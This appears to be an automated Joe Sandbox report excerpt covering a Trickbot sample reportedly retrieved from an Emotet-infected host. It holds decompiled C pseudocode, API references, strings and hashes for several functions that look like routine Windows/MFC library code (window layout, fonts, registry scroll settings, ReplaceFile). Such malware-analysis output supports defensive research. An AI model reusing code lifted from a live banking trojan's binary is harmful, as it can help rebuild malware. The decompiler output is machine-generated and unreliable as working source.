0x00427acb
0x00427adb
0x00427ae1
0x00427ae1
0x00427ae3
0x00427ae9
0x00427afc
0x00427b00
0x00427b02
0x00427b04
0x00427b04
0x00427b0f
0x00427b15
0x00427b15
0x00427b1a
0x00427bc7
0x00000000
0x00000000
0x00427bcd
0x00427bd2
0x00000000
0x00000000
0x00000000
0x00000000
0x00427b20
0x00427b20
0x00427b32
0x00427b35
0x00427b3b
0x00427b43
0x00427b4b
0x00427b53
0x00427b67
0x00427b68
0x00427b69
0x00427b6a
0x00427b6b
0x00427b6e
0x00427b6e
0x00427b7f
0x00427b7f
0x00427b87
0x00427b90
0x00427b96
0x00000000
0x00427b98
0x00427b98
0x00000000
0x00427b98
0x00427b96
0x004279be
0x004279be
0x004279c4
0x004279d4
0x004279da
0x004279da
0x004279dc
0x004279e2
0x00427a12
0x00427a15
0x00427a40
0x00427a59
0x00427a61
0x00427a69
0x00427a71
0x00427a85
0x00427a86
0x00427a87
0x00427a88
0x00427a89
0x00427a8c
0x00427a8c
0x00427a9d
0x00427a9d
0x00427aae
0x00427ab1
0x00427ab7
0x00427abd
0x00427abd
0x00000000
0x00427ab7
0x00427a42
0x00427a47
0x00000000
0x00427be8
0x00427be8
0x00427bea
0x00427bf1
0x00427bf6
0x00000000
0x00427bf6
0x00427a47
0x00427a17
0x00427a1c
0x00427a2c
0x00000000
0x004279e9
0x004279f7
0x004279fc
0x004279fe
0x004279fe
0x00427a0a
0x00427a10
0x00000000
0x00427a10
0x004279e2
0x00427c5d
0x00427c5d
0x00427c63
0x00427c6f
0x00000000
0x00427c6f

APIs

IsRectEmpty.USER32(?), ref: 00427888
GetClientRect.USER32(?,?), ref: 004278AD
BeginDeferWindowPos.USER32(?), ref: 004278DD
GetWindowRect.USER32(?,?), ref: 004279A2
OffsetRect.USER32(?,?,00000000), ref: 004279D4
OffsetRect.USER32(?,?,00000000), ref: 00427A0A
OffsetRect.USER32(?,00000002,00000000), ref: 00427A2C
EqualRect.USER32(?,?), ref: 00427A61
OffsetRect.USER32(?,00000000,?), ref: 00427ADB
OffsetRect.USER32(?,00000000,?), ref: 00427B0F
OffsetRect.USER32(?,00000000,?), ref: 00427B35
EqualRect.USER32(?,?), ref: 00427B43
EndDeferWindowPos.USER32(?), ref: 00427C88
SetRectEmpty.USER32(?), ref: 00427C92

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
String ID:
API String ID: 3160784657-0
Opcode ID: 88b065c76850a793ed8992cb1a5aae329f2bc4b40bd6e93441250f948ee08b73
Instruction ID: 1f0073370b9241fc8e12354876b96fe753e830e93c1beff061ce64f7269aabbd
Opcode Fuzzy Hash: 88b065c76850a793ed8992cb1a5aae329f2bc4b40bd6e93441250f948ee08b73
Instruction Fuzzy Hash: EBF11971E0562ADFCF14CFA9D984AAEBBB5FF08304F50812AE415E7215D738A941CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F315, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 168
stringlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041F315(intOrPtr __ecx) {
				void* __edi;
				void* __esi;
				void* _t60;
				CHAR* _t61;
				_Unknown_base(*)()* _t67;
				void* _t70;
				CHAR* _t73;
				short* _t79;
				CHAR* _t82;
				short* _t88;
				CHAR* _t91;
				void* _t112;
				long _t114;
				short* _t116;
				intOrPtr _t118;
				int _t122;
				int _t124;
				int _t126;
				void* _t127;
				void* _t129;
				void* _t130;
				short* _t133;
				intOrPtr _t135;

				E00405340(E00437A5C, _t127);
				_t130 = _t129 - 0x20;
				_t118 = __ecx;
				_push(_t112);
				 *((intOrPtr*)(_t127 - 0x1c)) = __ecx;
				E00417C3D(_t127 - 0x18, __ecx + 0xc);
				 *(_t127 - 4) = 0;
				E0041D323(_t118, _t112, _t118);
				if( *((intOrPtr*)( *(_t118 + 0x10) - 8)) != 0) {
					_t61 =  *0x447478; // 0x44748c
					_t114 = 0;
					 *(_t127 - 0x14) = _t61;
					_t135 =  *0x44b350; // 0x0
					 *(_t127 - 4) = 1;
					if(_t135 != 0) {
						L15:
						E0041D456( *(_t127 - 0x18));
						goto L16;
					} else {
						_t67 = GetProcAddress(GetModuleHandleA("KERNEL32"), "ReplaceFile");
						_t136 = _t67;
						 *(_t127 - 0x2c) = _t67;
						if(_t67 == 0) {
							goto L15;
						} else {
							_push(0);
							_push( *(_t118 + 0x10));
							_push(_t127 - 0x28);
							_t70 = E0041F0AF(_t136);
							_t133 = _t130 + 0xc;
							 *(_t127 - 4) = 2;
							E00417FB5(_t127 - 0x14, _t127, _t70);
							_t111 = _t127 - 0x28;
							 *(_t127 - 4) = 1;
							E00417EC8(_t127 - 0x28);
							_t73 =  *(_t127 - 0x14);
							 *(_t127 - 0x10) = _t73;
							if(_t73 != 0) {
								_t122 = lstrlenA(_t73) + 1;
								__eflags = _t122 + _t122 + 0x00000003 & 0x000000fc;
								E00405B80(_t122 + _t122 + 0x00000003 & 0x000000fc, _t111);
								_t79 = _t133;
								 *(_t127 - 0x24) = _t79;
								 *_t79 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t79, _t122);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
								 *(_t127 - 0x20) =  *(_t127 - 0x24);
							} else {
								 *(_t127 - 0x20) = 0;
							}
							_t82 =  *(_t118 + 0x10);
							 *(_t127 - 0x10) = _t82;
							if(_t82 != 0) {
								_t124 = lstrlenA(_t82) + 1;
								__eflags = _t124 + _t124 + 0x00000003 & 0x000000fc;
								E00405B80(_t124 + _t124 + 0x00000003 & 0x000000fc, _t111);
								_t88 = _t133;
								 *(_t127 - 0x24) = _t88;
								 *_t88 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t88, _t124);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
							} else {
								 *(_t127 - 0x24) = 0;
							}
							_t91 =  *(_t127 - 0x18);
							 *(_t127 - 0x10) = _t91;
							if(_t91 != 0) {
								_t126 = lstrlenA(_t91) + 1;
								__eflags = _t126 + _t126 + 0x00000003 & 0x000000fc;
								E00405B80(_t126 + _t126 + 0x00000003 & 0x000000fc, _t111);
								_t116 = _t133;
								 *_t116 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t116, _t126);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
							} else {
								_t116 = 0;
							}
							_push(0);
							_push(0);
							_push(3);
							_push( *(_t127 - 0x20));
							_push( *(_t127 - 0x24));
							_push(_t116);
							if( *(_t127 - 0x2c)() != 0) {
								E0041D456( *(_t127 - 0x14));
							} else {
								_t114 = GetLastError();
								if(_t114 == 0x498 || _t114 == 0) {
									goto L15;
								}
								L16:
								if(_t114 == 0x499) {
									E0041D456( *(_t127 - 0x14));
								}
								E0041D434( *(_t118 + 0x10),  *(_t127 - 0x18));
							}
						}
					}
					 *(_t127 - 4) = 0;
					E00417EC8(_t127 - 0x14);
				}
				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
				_t60 = E00417EC8(_t127 - 0x18);
				 *[fs:0x0] =  *((intOrPtr*)(_t127 - 0xc));
				return _t60;
			}

0x0041f31a
0x0041f31f
0x0041f324
0x0041f326
0x0041f32a
0x0041f331
0x0041f33a
0x0041f33d
0x0041f348
0x0041f34e
0x0041f353
0x0041f355
0x0041f358
0x0041f35e
0x0041f362
0x0041f49c
0x0041f49f
0x00000000
0x0041f368
0x0041f379
0x0041f37f
0x0041f381
0x0041f384
0x00000000
0x0041f38a
0x0041f38d
0x0041f38e
0x0041f392
0x0041f393
0x0041f398
0x0041f39f
0x0041f3a3
0x0041f3a8
0x0041f3ab
0x0041f3af
0x0041f3b4
0x0041f3bf
0x0041f3c2
0x0041f3ce
0x0041f3d5
0x0041f3d7
0x0041f3dc
0x0041f3e5
0x0041f3e8
0x0041f3ed
0x0041f3f6
0x0041f3f9
0x0041f3c4
0x0041f3c4
0x0041f3c4
0x0041f3fc
0x0041f401
0x0041f404
0x0041f410
0x0041f417
0x0041f419
0x0041f41e
0x0041f427
0x0041f42a
0x0041f42f
0x0041f438
0x0041f406
0x0041f406
0x0041f406
0x0041f43e
0x0041f443
0x0041f446
0x0041f451
0x0041f458
0x0041f45a
0x0041f45f
0x0041f468
0x0041f46d
0x0041f473
0x0041f448
0x0041f448
0x0041f448
0x0041f476
0x0041f477
0x0041f478
0x0041f47a
0x0041f47d
0x0041f480
0x0041f486
0x0041f4c5
0x0041f488
0x0041f48e
0x0041f496
0x00000000
0x00000000
0x0041f4a4
0x0041f4aa
0x0041f4af
0x0041f4af
0x0041f4bb
0x0041f4bb
0x0041f486
0x0041f384
0x0041f4cd
0x0041f4d0
0x0041f4d0
0x0041f4d5
0x0041f4dc
0x0041f4e7
0x0041f4f2

APIs

__EH_prolog.LIBCMT ref: 0041F31A

Part of subcall function 00417C3D: InterlockedIncrement.KERNEL32(?), ref: 00417C52

Part of subcall function 0041D323: CloseHandle.KERNEL32(00000001), ref: 0041D332
Part of subcall function 0041D323: GetLastError.KERNEL32(00000000,0041D07A,?,?,0041D018), ref: 0041D357

GetModuleHandleA.KERNEL32(KERNEL32,?), ref: 0041F36D
GetProcAddress.KERNEL32(00000000,ReplaceFile), ref: 0041F379

Part of subcall function 0041F0AF: __EH_prolog.LIBCMT ref: 0041F0B4
Part of subcall function 0041F0AF: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 0041F0E7
Part of subcall function 0041F0AF: GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000), ref: 0041F10D

Part of subcall function 00417EC8: InterlockedDecrement.KERNEL32(-000000F4), ref: 00417EDC

lstrlenA.KERNEL32(?,00000000), ref: 0041F3CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 0041F3ED
lstrlenA.KERNEL32(?,?,00000001), ref: 0041F40C
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001), ref: 0041F42F
lstrlenA.KERNEL32(?,?,00000001,?,00000001), ref: 0041F44D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001,?,00000001), ref: 0041F46D
GetLastError.KERNEL32(?,?,?,00000003,00000000,00000000,?,00000001,?,00000001,?,00000001), ref: 0041F488

Strings

KERNEL32, xrefs: 0041F368
ReplaceFile, xrefs: 0041F373

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$ErrorH_prologHandleInterlockedLastName$AddressCloseDecrementFileFullIncrementModulePathProcTemp
String ID: KERNEL32$ReplaceFile
API String ID: 3306742873-430465611
Opcode ID: 51fa0806f288d9cea2b617045269ef476c02b59769565b2711e83aa8139b35fa
Instruction ID: d7164ebacb032eaa6e0c0e8ab373f1155bf3d075358eb8877cc173b7cb90cad4
Opcode Fuzzy Hash: 51fa0806f288d9cea2b617045269ef476c02b59769565b2711e83aa8139b35fa
Instruction Fuzzy Hash: 905140B1D002199FCB10EFA5CD859EFBBB8FF18364B14056AE811B3291D7385E49CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042F264, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 111
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0042F264(void* __edi, void* __esi) {
				void* _t28;
				void* _t31;
				void* _t42;
				int _t44;
				struct HFONT__* _t50;
				void* _t53;
				void* _t64;
				void* _t65;
				void* _t67;
				void* _t70;
				intOrPtr _t76;
				void* _t77;
				void* _t79;
				void* _t86;

				_t67 = __esi;
				_t64 = __edi;
				_t28 = E00405340(E00438724, _t70);
				_t76 =  *0x44b35c; // 0x1
				if(_t76 != 0) {
					L21:
					 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
					return _t28;
				}
				E004330FA(0xa);
				_t77 =  *0x44b734; // 0x0
				if(_t77 == 0) {
					_t53 = LoadBitmapA( *(E00432562() + 0xc), 0x7912);
					 *0x44b734 = _t53;
					if(GetObjectA(_t53, 0x18, _t70 - 0x78) != 0) {
						 *0x44b728 =  *((intOrPtr*)(_t70 - 0x74));
						 *0x44b72c =  *((intOrPtr*)(_t70 - 0x70));
					}
				}
				_t79 =  *0x44b730; // 0x0
				if(_t79 != 0) {
					L11:
					_push(_t67);
					_push(_t64);
					_push(0);
					E004214F6(_t70 - 0x24, _t82);
					_t31 =  *0x44b730; // 0x0
					 *(_t70 - 4) = 0;
					if(_t31 == 0) {
						_t65 = 0;
						__eflags = 0;
					} else {
						_t65 = SelectObject( *(_t70 - 0x20), _t31);
					}
					 *((intOrPtr*)(_t70 - 0x10)) = GetTextMetricsA( *(_t70 - 0x1c), _t70 - 0xb0);
					if(_t65 != 0) {
						SelectObject( *(_t70 - 0x20), _t65);
					}
					if( *((intOrPtr*)(_t70 - 0x10)) == 0) {
						L18:
						E00422700(0x44b730);
						goto L19;
					} else {
						_t86 =  *(_t70 - 0xb0) -  *((intOrPtr*)(_t70 - 0xa4)) -  *0x44b72c; // 0x0
						if(_t86 <= 0) {
							L19:
							 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
							E00421568(_t70 - 0x24,  *(_t70 - 4));
							goto L20;
						}
						goto L18;
					}
				} else {
					E00405360(_t70 - 0x60, 0, 0x3c);
					 *((char*)(_t70 - 0x49)) = 1;
					 *((intOrPtr*)(_t70 - 0x50)) = 0x190;
					_t42 = 1;
					 *(_t70 - 0x60) = _t42 -  *0x44b72c;
					_t44 = GetSystemMetrics(0x2a);
					_t80 = _t44;
					if(_t44 == 0) {
						_push("Small Fonts");
					} else {
						_push("Terminal");
					}
					lstrcpyA(_t70 - 0x44, ??);
					if(E00422546(_t80, 0xf233, _t70 - 0x60) == 0) {
						 *((char*)(_t70 - 0x45)) = 0x20;
					}
					_t50 = CreateFontIndirectA(_t70 - 0x60);
					_t82 = _t50;
					 *0x44b730 = _t50;
					if(_t50 == 0) {
						L20:
						_t28 = E0043316A(0xa);
						goto L21;
					} else {
						goto L11;
					}
				}
			}

0x0042f264
0x0042f264
0x0042f269
0x0042f277
0x0042f27d
0x0042f3c3
0x0042f3c7
0x0042f3cf
0x0042f3cf
0x0042f285
0x0042f28a
0x0042f290
0x0042f2a0
0x0042f2a9
0x0042f2ba
0x0042f2bf
0x0042f2c7
0x0042f2c7
0x0042f2ba
0x0042f2cc
0x0042f2d2
0x0042f345
0x0042f345
0x0042f346
0x0042f347
0x0042f34b
0x0042f350
0x0042f35d
0x0042f360
0x0042f36c
0x0042f36c
0x0042f362
0x0042f368
0x0042f368
0x0042f380
0x0042f383
0x0042f389
0x0042f389
0x0042f390
0x0042f3a6
0x0042f3ab
0x00000000
0x0042f392
0x0042f39e
0x0042f3a4
0x0042f3b0
0x0042f3b0
0x0042f3b7
0x00000000
0x0042f3b7
0x00000000
0x0042f3a4
0x0042f2d4
0x0042f2db
0x0042f2e3
0x0042f2e7
0x0042f2f0
0x0042f2f9
0x0042f2fc
0x0042f302
0x0042f304
0x0042f30d
0x0042f306
0x0042f306
0x0042f306
0x0042f316
0x0042f32c
0x0042f32e
0x0042f32e
0x0042f336
0x0042f33c
0x0042f33e
0x0042f343
0x0042f3bc
0x0042f3be
0x00000000
0x00000000
0x00000000
0x00000000
0x0042f343

APIs

__EH_prolog.LIBCMT ref: 0042F269

Part of subcall function 004330FA: EnterCriticalSection.KERNEL32(0044B558,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433135
Part of subcall function 004330FA: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433147
Part of subcall function 004330FA: LeaveCriticalSection.KERNEL32(0044B558,?,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D), ref: 00433150
Part of subcall function 004330FA: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00432E04,00000010,?,00000000,?,?,?,00432587,004325D4,00430506,0043258D,0041C011), ref: 00433162

LoadBitmapA.USER32(?,00007912), ref: 0042F2A0
GetObjectA.GDI32(00000000,00000018,?), ref: 0042F2B2
GetSystemMetrics.USER32(0000002A), ref: 0042F2FC
lstrcpyA.KERNEL32(?,Small Fonts,?,0000000A), ref: 0042F316
CreateFontIndirectA.GDI32(?), ref: 0042F336
SelectObject.GDI32(?,00000000), ref: 0042F366
GetTextMetricsA.GDI32(?,?), ref: 0042F378
SelectObject.GDI32(?,00000000), ref: 0042F389

Strings

Terminal, xrefs: 0042F306
, xrefs: 0042F32E
Small Fonts, xrefs: 0042F30D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalSection$Object$EnterMetricsSelect$BitmapCreateFontH_prologIndirectInitializeLeaveLoadSystemTextlstrcpy
String ID: $Small Fonts$Terminal
API String ID: 1234877182-3042510724
Opcode ID: d3f802850265f098d50966ea408fdaa0929af5969bf12728ac1da03c61b3434d
Instruction ID: 219b476f64bc7fdea7f6c7d6ea1d618f6714e8619a5fe76a679f0cae40a0b0cc
Opcode Fuzzy Hash: d3f802850265f098d50966ea408fdaa0929af5969bf12728ac1da03c61b3434d
Instruction Fuzzy Hash: 69419F75A003199FDB10DFB5EC89AAEB7B8FB44304F90503AE801E3291D7B89D05CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00410660, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410660(struct HWND__* _a4, long _a8) {
				char _v16;
				void* _t7;
				struct HWND__* _t29;

				_t29 = _a4;
				_t7 = GetPropA(_t29, 0);
				if(_t7 == 0) {
					_t7 = GetPropA(_t29, 0);
					if(_t7 == 0) {
						_t7 = GetPropA(_t29, 0);
						if(_t7 == 0) {
							_t7 = GetPropA(_t29, 0);
							if(_t7 == 0) {
								_t7 = GetPropA(_t29, 0);
								if(_t7 == 0) {
									_t7 = GetPropA(_t29, 0);
									if(_t7 == 0) {
										_t7 = E004105F0(_t29);
										if(_t7 == 0) {
											if( *0x44de45 != 0 && IsWindowUnicode(_t29) == 0) {
												GetClassNameA(_t29,  &_v16, 0x10);
												lstrcmpiA( &_v16, "edit");
											}
											return SetPropA(_t29, 0, SetWindowLongA(_t29, 0xfffffffc, _a8));
										}
									}
								}
							}
						}
					}
				}
				return _t7;
			}

0x0041066c
0x00410679
0x0041067d
0x0041068d
0x00410691
0x004106a1
0x004106a5
0x004106b5
0x004106b9
0x004106c9
0x004106cd
0x004106d9
0x004106dd
0x004106e0
0x004106ea
0x004106f3
0x00410708
0x00410718
0x0041071e
0x00000000
0x00410739
0x004106ea
0x004106dd
0x004106cd
0x004106b9
0x004106a5
0x00410691
0x00410744

APIs

GetPropA.USER32(?,00000000), ref: 00410679
GetPropA.USER32(?,00000000), ref: 0041068D
GetPropA.USER32(?,00000000), ref: 004106A1
GetPropA.USER32(?,00000000), ref: 004106B5
GetPropA.USER32(?,00000000), ref: 004106C9
GetPropA.USER32(?,00000000), ref: 004106D9
IsWindowUnicode.USER32(?), ref: 004106F6
GetClassNameA.USER32(?,?,00000010), ref: 00410708
lstrcmpiA.KERNEL32(?,edit), ref: 00410718
SetWindowLongA.USER32(?,000000FC,?), ref: 00410728
SetPropA.USER32(?,00000000,00000000), ref: 00410739

Strings

edit, xrefs: 00410712

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Prop$Window$ClassLongNameUnicodelstrcmpi
String ID: edit
API String ID: 4088303749-2167791130
Opcode ID: f36042ec29b1b8a59c76c230e32340138c86ac5640fdab9cc2f75527457e0a77
Instruction ID: e7b4950ba27239ceebb0593ff6ed2a0e1363c1adbdf2a17cd7b5dbcb592423dd
Opcode Fuzzy Hash: f36042ec29b1b8a59c76c230e32340138c86ac5640fdab9cc2f75527457e0a77
Instruction Fuzzy Hash: B421516A6011127AA751BB789D04EFF27DCAF59684B000535FD54C1150F7A8DDC2CB7E

Uniqueness

Uniqueness Score: -1.00%

Function 0041FABD, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 80
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FABD() {
				void* _v8;
				int _v12;
				int _v16;
				char _v144;
				void _t9;
				struct HWND__* _t20;
				void _t21;
				int _t22;
				int _t23;
				int _t27;
				short _t28;
				intOrPtr _t30;

				_t27 =  *0x449794; // 0x0
				if(_t27 != 0) {
					L16:
					_t9 =  *0x44b120; // 0x0
					return _t9;
				}
				_t28 =  *0x44b11c; // 0x0
				 *0x449794 = 1;
				if(_t28 != 0) {
					L10:
					__eflags =  *0x44b11c - 2;
					if( *0x44b11c != 2) {
						L4:
						_t30 =  *0x44b354; // 0x1
						 *0x44b120 = 3;
						if(_t30 != 0) {
							__eflags =  *0x44b350; // 0x0
							if(__eflags == 0) {
								SystemParametersInfoA(0x68, 0, 0x44b120, 0);
							}
						} else {
							if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop", 0, 1,  &_v8) == 0) {
								_v12 = 0x80;
								if(RegQueryValueExA(_v8, "WheelScrollLines", 0,  &_v16,  &_v144,  &_v12) == 0) {
									 *0x44b120 = E00405B68( &_v144, 0, 0xa);
								}
								RegCloseKey(_v8);
							}
						}
						goto L16;
					}
					_t20 = FindWindowA("MouseZ", "Magellan MSWHEEL");
					__eflags = _t20;
					if(_t20 == 0) {
						goto L4;
					}
					_t23 =  *0x44b118; // 0x0
					__eflags = _t23;
					if(_t23 == 0) {
						goto L4;
					}
					_t21 = SendMessageA(_t20, _t23, 0, 0);
					 *0x44b120 = _t21;
					return _t21;
				}
				_t22 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
				 *0x44b118 = _t22;
				if(_t22 != 0) {
					 *0x44b11c = 2;
					goto L10;
				} else {
					 *0x44b11c = 1;
					goto L4;
				}
			}

0x0041fac9
0x0041facf
0x0041fbf2
0x0041fbf2
0x00000000
0x0041fbf2
0x0041fad5
0x0041fadc
0x0041fae6
0x0041fb96
0x0041fb96
0x0041fb9e
0x0041fb0d
0x0041fb0d
0x0041fb13
0x0041fb1d
0x0041fbdb
0x0041fbe1
0x0041fbec
0x0041fbec
0x0041fb23
0x0041fb3c
0x0041fb45
0x0041fb69
0x0041fb7d
0x0041fb7d
0x0041fb85
0x0041fb85
0x0041fb3c
0x00000000
0x0041fb1d
0x0041fbae
0x0041fbb4
0x0041fbb6
0x00000000
0x00000000
0x0041fbbc
0x0041fbc2
0x0041fbc4
0x00000000
0x00000000
0x0041fbce
0x0041fbd4
0x00000000
0x0041fbd4
0x0041faf1
0x0041faf9
0x0041fafe
0x0041fb8d
0x00000000
0x0041fb04
0x0041fb04
0x00000000
0x0041fb04

APIs

RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG), ref: 0041FAF1
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop,00000000,00000001,?), ref: 0041FB34
RegQueryValueExA.ADVAPI32(?,WheelScrollLines,00000000,?,?,?), ref: 0041FB61
RegCloseKey.ADVAPI32(?), ref: 0041FB85
FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 0041FBAE
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0041FBCE
SystemParametersInfoA.USER32(00000068,00000000,0044B120,00000000), ref: 0041FBEC

Strings

Control Panel\Desktop, xrefs: 0041FB2A
WheelScrollLines, xrefs: 0041FB59
MSH_SCROLL_LINES_MSG, xrefs: 0041FAEC
Magellan MSWHEEL, xrefs: 0041FBA4
MouseZ, xrefs: 0041FBA9

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MessageWindow$CloseFindInfoOpenParametersQueryRegisterSendSystemValue
String ID: Control Panel\Desktop$MSH_SCROLL_LINES_MSG$Magellan MSWHEEL$MouseZ$WheelScrollLines
API String ID: 1228133072-821443377
Opcode ID: 5c0ba1b7cf31be68934b38c43d84f9e3d86228405ce0235e948782c6e4e3011e
Instruction ID: 50c4481848f6c20c1b5d52b323461859e73a832251f40a79bd6bd37f3963a02b
Opcode Fuzzy Hash: 5c0ba1b7cf31be68934b38c43d84f9e3d86228405ce0235e948782c6e4e3011e
Instruction Fuzzy Hash: 35216574904228EADB209F61DC69FEB7B78FB09791F104136F40592250D7B89989CBED

Uniqueness

Uniqueness Score: -1.00%

Function 0042E799, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 73
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0042E799(void* __ecx, CHAR* _a4) {
				char _v520;
				intOrPtr _t36;
				intOrPtr _t45;
				void* _t55;
				void* _t56;

				_t55 = __ecx;
				if((E0041B66F(__ecx) & 0x00000040) == 0) {
					lstrcpyA( &_v520,  *(__ecx + 0xac));
					if(_a4 != 0) {
						lstrcatA( &_v520, " - ");
						lstrcatA( &_v520, _a4);
						_t36 =  *((intOrPtr*)(_t55 + 0x40));
						if(_t36 > 0) {
							_push(_t36);
							wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
						}
					}
					L9:
					return E004226A8( *((intOrPtr*)(_t55 + 0x1c)),  &_v520);
				}
				_v520 = _v520 & 0x00000000;
				if(_a4 == 0) {
					L5:
					lstrcatA( &_v520,  *(_t55 + 0xac));
					goto L9;
				}
				lstrcpyA( &_v520, _a4);
				_t45 =  *((intOrPtr*)(_t55 + 0x40));
				if(_t45 > 0) {
					_push(_t45);
					wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
				}
				lstrcatA( &_v520, " - ");
				goto L5;
			}

0x0042e7a4
0x0042e7ae
0x0042e82a
0x0042e834
0x0042e848
0x0042e854
0x0042e856
0x0042e85b
0x0042e85d
0x0042e878
0x0042e87e
0x0042e85b
0x0042e881
0x0042e893
0x0042e893
0x0042e7b0
0x0042e7c1
0x0042e80c
0x0042e819
0x00000000
0x0042e819
0x0042e7cd
0x0042e7d3
0x0042e7d8
0x0042e7da
0x0042e7f5
0x0042e7fb
0x0042e80a
0x00000000

APIs

Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B

lstrcpyA.KERNEL32(00000000,00000000), ref: 0042E7CD
lstrlenA.KERNEL32(00000000,:%d,?), ref: 0042E7E7
wsprintfA.USER32 ref: 0042E7F5
lstrcatA.KERNEL32(00000000, - ), ref: 0042E80A
lstrcatA.KERNEL32(00000000,?), ref: 0042E819
lstrcpyA.KERNEL32(?,?), ref: 0042E82A
lstrcatA.KERNEL32(?, - ), ref: 0042E848
lstrcatA.KERNEL32(?,00000000), ref: 0042E854
lstrlenA.KERNEL32(?,:%d,?), ref: 0042E86A
wsprintfA.USER32 ref: 0042E878

Strings

:%d, xrefs: 0042E7E1, 0042E864
- , xrefs: 0042E804, 0042E842

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
